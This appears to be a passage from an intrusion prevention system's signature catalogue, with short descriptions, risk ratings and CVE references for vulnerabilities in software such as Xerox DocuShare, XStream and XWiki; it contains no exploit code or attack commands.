High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Xerox DocuShare

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Xerox DocuShare. The vulnerability is due to insufficient validation of requests sent to ResultBackgroundJobMultiple. A remote attacker can exploit this vulnerability by sending a specially crafted request to the target service. This can result in SQL injection and possibly code execution.

Situation:

HTTP_CSU-Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection

References:

BID-66922
http://www.securityfocus.com/bid/66922

OSVDB-105972
http://www.osvdb.org/105972

XFSP_X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the X.Org X Font Server due to an integer overflow

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

XOrg Font Server

Type:

Buffer Overflow

Description:

The X.Org Font Server suffers from multiple vulnerabilities related to the handling of QueryXExtents and QueryXBitmaps functions. The vulnerabilities are due to integer overflows that lead to buffer overflows and allow arbitrary code execution. Remote attackers can exploit these vulnerabilities by sending malicious requests over TCP to a vulnerable host.

Situation:

Generic_CS-X.org-X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow

References:

CVE-2007-4568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4568

BID-25898
http://www.securityfocus.com/bid/25898

Xitami-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Xitami HTTP server

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Imatix Xitami for Windows

Type:

Malfunction

Description:

Xitami HTTP Server for Windows is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request appended with MSDOS device name to the server to cause the server to crash.

Situation:

FTP_CS-XLink-FTP-Server-Buffer-Overflow

References:

CVE-2001-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0391

BID-2622
http://www.securityfocus.com/bid/2622

OSVDB-11640
http://www.osvdb.org/11640

XLink-FTP-Server-Buffer-Overflow

About this vulnerability:

XLink FTP Server bundled with Omni NFS Server 5.2 Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

XLink Omni

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in XLink FTP Server bundled with Omni NFS Server 5.2 which allows remote attackers to execute arbitrary code, or cause a denial of service condition.

Situation:

References:

CVE-2006-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5792

OSVDB-58646
http://www.osvdb.org/58646

XLink-Omni-NFS-Server-Buffer-Overflow

About this vulnerability:

XLink Omni NFS Server 5.2 Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

XLink Omni

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in XLink Omni NFS Server 5.2, in nfsd.exe, which allows remote attackers to execute arbitrary code, or cause a denial of service condition.

Situation:

Generic_CS-XLink-Omni-NFS-Server-Buffer-Overflow

References:

CVE-2006-5780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5780

BID-20941
http://www.securityfocus.com/bid/20941

OSVDB-30224
http://www.osvdb.org/30224

XM-Easy-Personal-FTP-Server-Nlst-DoS

About this vulnerability:

An XM Easy Personal FTP Server Nlst DoS vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-729-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

XM Easy Personal FTP Server

Type:

Input Validation

Description:

A vulnerability in XM Easy Personal FTP Server, versions 5.6.0 and 5.7.0, which allows remote attackers to cause a denial of service condition via a crafted argument to the NLST command.

Situation:

FTP_CS-XM-Easy-Personal-FTP-Server-Nlst-DoS

References:

CVE-2008-5626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5626

OSVDB-50837
http://www.osvdb.org/50837

Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution

About this vulnerability:

Shell command execution vulnerability in PEAR XML_RPC and PHPXMLRPC

Risk:

Moderate

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

PHP

Type:

Malfunction

Description:

PEAR XML_RPC and PHPXMLRPC libraries suffer from an eval injection vulnerability that allows remote attackers to execute arbitrary shell commands on a vulnerable system.

Situation:

HTTP_CS-Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution

References:

CVE-2005-1921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921

BID-14088
http://www.securityfocus.com/bid/14088

XMLDsig-Hmac-Truncation-Authentication-Bypass

About this vulnerability:

A vulnerability in XMLDsig ds:HMACOutputLength parameter

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic HTTP client; Generic HTTP server

Type:

Insecure Configuration

Description:

A design weakness exists in W3C security standard recommendation for XML Signature Syntax and Processing (XMLDsig). The weakness in design might cause implementations based on this design to be vulnerable to an authentication bypass by remote attackers. More specifically, the XMLDsig recommendation includes support for HMAC truncation (as specified in RFC2104). The XMLDsig specification, however, does not follow the RFC2104 recommendation and does not prevent truncation to less than half of the length of the hash output. When HMAC truncation is under the control of an attacker this can result in an effective authentication bypass.

Situation:

HTTP_CS-XMLDsig-Hmac-Truncation-Authentication-Bypass
File-TextId_XMLDsig-Hmac-Truncation-Authentication-Bypass

References:

CVE-2009-0217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0217

BID-35671
http://www.securityfocus.com/bid/35671

OSVDB-55907
http://www.osvdb.org/55907

OSVDB-55895
http://www.osvdb.org/55895

MS10-041
http://technet.microsoft.com/security/bulletin/MS10-041

XMRig_CPU_Miner_Binary_File

About this vulnerability:	XMRig binary file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1064-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Resource Starvation
Description:	XMRig is a CPU based miner for Monero cryptocurrency. The software itself isn't malicious, but it's very usual that it's downloaded to the already infected system to mine cryptocurrency. Running XMRig can take a lot of resources from the system it's running on.
Situation:	File-Binary_XMRig_CPU_Miner_Binary_File File-Exe_XMRig_CPU_Miner_Binary_File

Xnview-PCT-File-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in XnView XnView

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

XnView

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in XnView. The vulnerability is due to a boundary error in processing image data in certain PCT files. An attacker can exploit this vulnerability by enticing a user to open a maliciously crafted file. A successful attack can lead to arbitrary code execution in the context of the user.

Situation:

File-Binary_Xnview-PCT-File-Processing-Buffer-Overflow

References:

CVE-2013-2577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2577

OSVDB-95580
http://www.osvdb.org/95580

Xpdf-Splash-Drawimage-Integer-Overflow

About this vulnerability:

A vulnerability in Glyph & Cog Xpdf

Risk:

High

First detected in:

sgpkg-ips-261-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Glyph & Cog Xpdf

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Glyph & Cog Xpdf. The vulnerability is due to a lack of input validation when handling images within PDF documents. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted PDF file with the affected application. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Xpdf-Splash-Drawimage-Integer-Overflow
File-PDF_Xpdf-Splash-Drawimage-Integer-Overflow

References:

CVE-2009-3604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3604

BID-36703
http://www.securityfocus.com/bid/36703

XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF

About this vulnerability:

LibXpm buffer overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

libXpm

Type:

Buffer Overflow

Description:

XPM image decoding functions xpmParseColors and ParseAndPutPixels in LibXpm contain buffer overflow vulnerabilities. A user-supplied number of bytes are copied into a fixed-size buffer, thus potentially allowing arbitrary code execution.

Situation:

HTTP_XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF
File-TextId_XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF

References:

CVE-2004-0687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0687

BID-11196
http://www.securityfocus.com/bid/11196

XpoLog-Center-Remote-Command-Execution

About this vulnerability:	A vulnerability in XpoLog Center
Risk:	Moderate
First detected in:	sgpkg-ips-798-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	XpoLog Center
Type:	Input Validation
Description:	A vulnerability in XpoLog Center
Situation:	HTTP_CRL-XpoLog-Center-Remote-Command-Execution

Xstream-Library-CVE-2020-26217-Insecure-Deserialization

About this vulnerability:

A vulnerability in XStream XStream

Risk:

Moderate

First detected in:

sgpkg-ips-1311-5242

Last changed:

sgpkg-ips-1311-5242

Platform:

Generic

Software:

XStream

Type:

Input Validation

Description:

Improper validation of user input during unmarshalling of XML and JSON data causes a vulnerability in XStream. A successful exploitation may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Xstream-Library-CVE-2020-26217-Insecure-Deserialization

References:

CVE-2020-26217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26217

Xstream-Library-CVE-2020-26258-Insecure-Deserialization

About this vulnerability:

A vulnerability in XStream

Risk:

High

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

XStream

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in XStream Library. The vulnerability is due to improper validation of user input during unmarshalling of XML and JSON data. A remote attacker could exploit this vulnerability by sending specially crafted XML or JSON data to the affected application. Successful exploitation could allow the attacker to spoof requests as the target server.

Situation:

File-Text_Xstream-Library-CVE-2020-26258-Insecure-Deserialization

References:

CVE-2020-26258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258

Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in XStream XStream

Risk:

Moderate

First detected in:

sgpkg-ips-1341-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

XStream

Type:

Input Validation

Description:

Improper validation of JSON and XML data received by the XStream library causes an arbitrary file deletion vulnerability that can be exploited to delete files on the target system and cause a denial of service condition.

Situation:

Generic_CS-Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion

References:

CVE-2020-26259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26259

Xstream-Library-Insecure-Deserialization

About this vulnerability:

An attempt to exploit a vulnerability in Xstream library insecure deserialization detected

Risk:

High

First detected in:

sgpkg-ips-1520-5242

Last changed:

sgpkg-ips-1520-5242

Platform:

Generic

Software:

XStream

Type:

Input Validation

Description:

XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream.

Situation:

HTTP_CS_Xstream-Library-Insecure-Xml-Deserialization-CVE-2021-39144

References:

CVE-2021-39144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39144

Xstream-Library-Reflectionconverter-Insecure-Deserialization

About this vulnerability:

A vulnerability in XStream

Risk:

Moderate

First detected in:

sgpkg-ips-1180-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

XStream

Type:

Input Validation

Description:

There has been reported an insecure serialization vulnerability in XStream Library. This vulnerability could be remotely exploited. Successful exploitation can lead in arbitrary code execution.

Situation:

File-Text_Xstream-Library-Reflectionconverter-Insecure-Deserialization

References:

CVE-2019-10173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10173

Xstream-Unsafe-Deserialization

About this vulnerability:	An attempt to exploit a vulnerability in XStream library detected
Risk:	High
First detected in:	sgpkg-ips-1668-5242
Last changed:	sgpkg-ips-1668-5242
Platform:	Generic
Software:	XStream
Type:	Input Validation
Description:	XStream is an library that converts Java objects to XML, JSON, and other formats, and vice versa. Over the years, there have been quite a few unsafe deserialization vulnerabilities of the library found (See: https://x-stream.github.io/security.html). Attackers could exploit them to access private data, execute arbitrary code or shell commands in the context of the server running the XStream process, or cause a denial-of-service. This fingerprint aims to detect such exploits.
Situation:	File-Text_Xstream-Unsafe-Deserialization File-TextId_Xstream-Unsafe-Deserialization

Xstream-Unsafe-Deserialization-CVE-2021-29505

About this vulnerability:

A vulnerability in XStream

Risk:

High

First detected in:

sgpkg-ips-1836-5242

Last changed:

sgpkg-ips-1836-5242

Platform:

Generic

Software:

XStream

Type:

Input Validation

Description:

Improper validation of user input during unmarshalling of XML data causes a vulnerability in XStream versions before 1.4.17. A successful exploitation may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Xstream-Unsafe-Deserialization

References:

CVE-2021-29505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505

XTACACSD-Buffer-Overflow

About this vulnerability:

An XTACACSD Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

XTACACSD

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in XTACACSD, versions 4.1.2 and before, which allows remote attackers to execute arbitrary code via a crafted CONNECT TACACS command.

Situation:

Generic_UDP-XTACACSD-Buffer-Overflow

References:

CVE-2008-7232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7232

OSVDB-58140
http://www.osvdb.org/58140

Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Xunlei Thunder

Risk:

High

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Xunlei Thunder

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the PPlayer ActiveX component included in the Xunlei Thunder application. The vulnerability allows arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow
File-Text_Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow

References:

CVE-2007-6144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

BID-26536
http://www.securityfocus.com/bid/26536

OSVDB-39680
http://www.osvdb.org/39680

Xunlei-Thunder-Usage

About this vulnerability:	Usage of Xunlei Thunder download accelerator
Risk:	Moderate
First detected in:	sgpkg-ips-184-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Xunlei Thunder
Type:	Peer-to-Peer
Description:	Xunlei Thunder is a download accelerator that can be used to share files and download files from various peer-to-peer networks.
Situation:	HTTP_CS-Xunlei-Thunder-Network-Connect

Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute

About this vulnerability:

Vulnerability in Web Thunderbolt allows arbitary code execution

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Xunlei Thunderbolt

Type:

Malfunction

Description:

There is a vulnerability in Web Thunderbolt, a web download accelerator and manager. The application embeds an ActiveX object, ThunderServer, that allows downloading and execution of arbitary files.

Situation:

HTTP_SS-Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute
File-Text_Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute

References:

CVE-2007-3296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3296

BID-24552
http://www.securityfocus.com/bid/24552

OSVDB-38474
http://www.osvdb.org/38474

Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Web Thunderbolt allows arbitary code execution

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Xunlei Thunderbolt

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in Xunlei Thunderbolt, a web download accelerator and manager. The application contains an ActiveX object, ThunderServer, that suffers from a buffer overflow vulnerability. This may lead to code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow
File-Text_Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow

References:

CVE-2007-5064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

BID-25751
http://www.securityfocus.com/bid/25751

OSVDB-37777
http://www.osvdb.org/37777

Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution

About this vulnerability:

Vulnerability in Web Thunderbolt allows arbitary code execution

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Xunlei Thunderbolt

Type:

Malfunction

Description:

There is a vulnerability in Xunlei Thunderbolt, a web download accelerator and manager. The application embeds an ActiveX object, ThunderServer, that bypasses the security boundary, leading to code execution in the privileges of the currently logged on user.

Situation:

HTTP_Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution
File-Text_Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution

References:

CVE-2007-3296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3296

BID-24552
http://www.securityfocus.com/bid/24552

OSVDB-38474
http://www.osvdb.org/38474

Xupiter-Toolbar

About this vulnerability:	Xupiter Toolbar
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Xupiter Toolbar
Type:	Misconfiguration
Description:	Xupiter Toolbar is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Xupiter-Toolbar HTTP_CSH-Xupiter-Toolbar

Xwiki-Attachmentselector-Docname-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1584-5242

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability has been reported in XWiki. The vulnerability is due to insufficient validation of user data used in the AttachmentSelector. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of the server process.

Situation:

HTTP_CRL-Xwiki-Attachmentselector-Docname-Code-Injection

References:

CVE-2023-29516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29516

Xwiki-Deleteattachment-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1516-5242

Last changed:

sgpkg-ips-1516-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Improper validation of deleted attachment file names causes a cross-site scripting vulnerability in Xwiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Xwiki-Deleteattachment-Stored-Cross-Site-Scripting

References:

CVE-2022-36096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36096

Xwiki-Filename-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1513-5242

Last changed:

sgpkg-ips-1513-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Insufficient validation of attachment file names causes a cross-site scripting vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CS-Xwiki-Filename-Stored-Cross-Site-Scripting

References:

CVE-2022-36094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36094

Xwiki-Legacynotificationadministration-Since-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1586-5242

Last changed:

sgpkg-ips-1586-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Insufficient validation of user data used in the LegacyNotificationAdministration causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitary code on the target server.

Situation:

HTTP_CRL-Xwiki-Legacynotificationadministration-Since-Code-Injection

References:

CVE-2023-29525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29525

Xwiki-Mentionsmacro.XML-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1543-5242

Last changed:

sgpkg-ips-1543-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Insufficient validation of mention macro values causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target program.

Situation:

HTTP_CRL-Xwiki-Mentionsmacro.XML-Code-Injection

References:

CVE-2022-36098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36098

Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection

About this vulnerability:

A vulnerability in XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Improper input validation in properties of an object of XWiki.SearchSuggestSourceClass and XWiki.SearchSuggestConfig types causes a server-side template injection vulnerability in XWiki. A successful exploitation allows an attacker to execute code on the target system.

Situation:

HTTP_CRL-Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection

References:

CVE-2024-37901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37901

Xwiki-Searchsuggestsourcesheet-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1723-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

The lack of input validation when when handling SearchSuggestSourceSheet objects causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Xwiki-Searchsuggestsourcesheet-Code-Injection

References:

CVE-2024-31465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31465

Xwiki-Solrsearchmacros-Text-Code-Injection

About this vulnerability:

A vulnerability in XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Improper input validation of the text parameter provided to the SolrSearchMacros component causes a code injection vulnerability in XWiki. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Xwiki-Solrsearchmacros-Text-Code-Injection

References:

CVE-2025-24893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24893

Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1621-5242

Last changed:

sgpkg-ips-1621-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Improper input validation in the tips panel causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection

References:

CVE-2023-35166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35166

Xwiki-Upload-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1761-5242

Last changed:

sgpkg-ips-1761-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Improper input validation in file uploads causes a cross-site scripting vulnerability in XWiki. A successful exploitation can allow an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CS-Xwiki-Upload-Reflected-Cross-Site-Scripting

References:

CVE-2024-37900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37900

Xwiki-Xwikiserverclasssheet-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1523-5242

Last changed:

sgpkg-ips-1523-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Insufficient validation of requests using the XWikiServerClassSheet causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Xwiki-Xwikiserverclasssheet-Code-Injection

References:

CVE-2022-36099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36099

Xwiki.org-Change-Request-Extension-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org Change Request extension

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability have been reported in XWiki Change Request extension. The vulnerability is due to improper input validation of change request titles. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code injection.

Situation:

HTTP_CRL-Xwiki.org-Change-Request-Extension-Code-Injection

References:

CVE-2023-45138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45138

Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

The lack of input validation when handling the section parameter causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection

References:

CVE-2023-46731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46731

Xwiki.org-Xwiki-Databasesearch-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1722-5242

Last changed:

sgpkg-ips-1722-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability has been reported for XWiki.org XWiki. This vulnerability is due to improper input validation in the DatabaseSearch component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of of the current application.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Databasesearch-Code-Injection

References:

CVE-2024-31982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31982

Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1611-5242

Last changed:

sgpkg-ips-1611-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported for XWiki. This vulnerability is due to improper input validation of the editor and section parameters for the importinline view. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted link. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CSU-Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting

References:

CVE-2023-32071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32071

Xwiki.org-Xwiki-Invitationguestactions-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1618-5242

Last changed:

sgpkg-ips-1618-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability have been reported in XWiki. The vulnerability is due to improper input validation when rendering a link in the Invitation Application. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code injection.

Situation:

HTTP_CSU-Xwiki.org-Xwiki-Invitationguestactions-Code-Injection

References:

CVE-2023-35150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35150

Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in XWiki. The vulnerability is due to insufficient validation of names when moving attachments. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim to use a crafted link. Successful exploitation could result in the execution of script code in the security context of a victim's browser.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting

References:

CVE-2022-36097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36097

Xwiki.org-Xwiki-Notificationrssservice-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1614-5242

Last changed:

sgpkg-ips-1614-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability have been reported in XWiKi. The vulnerability is due to improper input validation when rendering an RSS feed. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code injection.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Notificationrssservice-Code-Injection

References:

CVE-2023-36469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36469

Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1592-5242

Last changed:

sgpkg-ips-1592-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:
